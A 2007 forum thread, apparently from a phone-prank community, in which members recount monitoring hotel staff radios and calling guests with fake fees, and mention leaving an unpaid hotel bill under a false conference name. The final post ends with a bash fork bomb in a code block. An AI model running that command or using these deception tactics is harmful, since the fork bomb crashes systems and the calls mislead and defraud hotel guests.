Author Topic: Any chance of hearing those hotel radio pranks?  (Read 2127 times)

Offline klown

• Newb
  • 1337 13V3L: +0/-1
Any chance of hearing those hotel radio pranks?
« on: September 09, 2007, 07:46:47 PM »
I was just wondering if we are going to be blessed with those radio pranks that you did in Reno.  Out of all the pranks you guys do they are the best.  Probably because that shit is so unexpected.  If you guys know of any other links to these kinds of pranks please post them. ;D

Offline rbcp

• Head Custodian
  • Administrator
  • Ninja Phone Loser
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Any chance of hearing those hotel radio pranks?
« Reply #1 on: September 10, 2007, 06:22:48 AM »
We got so caught up in pranking all those rooms with the neighbor's phone line that we really didn't accomplish anything with the radios.  They were in a frequency range that we couldn't transmit on anyway.  Our plan with the radio, though, was to listen for calls to maids to certain rooms.  Then call up those rooms and use the information we had to piss off the guests.  RijilV and I did this at Rubicon one year.  Like if they were having extra towels sent to their room, we'd call and tell them that there was a $15 non-refundable deposit on each extra towel.  If someone was coming up to fix their toilet, we'd call and tell them that we were charging them $200 to fix the toilet that they broke.

Offline klown

• Newb
  • 1337 13V3L: +0/-1
« Reply #2 on: September 11, 2007, 04:52:27 AM »
Check out this site.  There is some pretty funny shit.

http://phantomsignals.mypodcast.com/

Offline M-26-7

• Skinniest Member of the PLA
  • PLA Junkie
  • 1337 13V3L: +40/-61
« Reply #3 on: September 11, 2007, 11:05:38 AM »
http://www.phonelosers.org
These guys are pretty ghey, but occasionally funny.

Offline RijilV

• :)
  • PLA Guru
  • 1337 13V3L: +30/-7
« Reply #4 on: September 11, 2007, 11:04:15 PM »
RijilV and I did this at Rubicon one year.  Like if they were having extra towels sent to their room, we'd call and tell them that there was a $15 non-refundable deposit on each extra towel.  If someone was coming up to fix their toilet, we'd call and tell them that we were charging them $200 to fix the toilet that they broke.

Yeah and the hotel got freaked out too, thinking we hax0r3d into their computer system or something...man they were stupid.  Of course, that was the same hotel that we had Rubicon at 4 years earlier, and still owed them around $8,000 for.  Same person was in charge of renting the conference space too - we went by 'RC5 conference'.

I guess they were kinda stupid.

But that is a pretty good prank to pull on a hotel

Code: [Select]
#!/bin/bash
:() { :|:& };: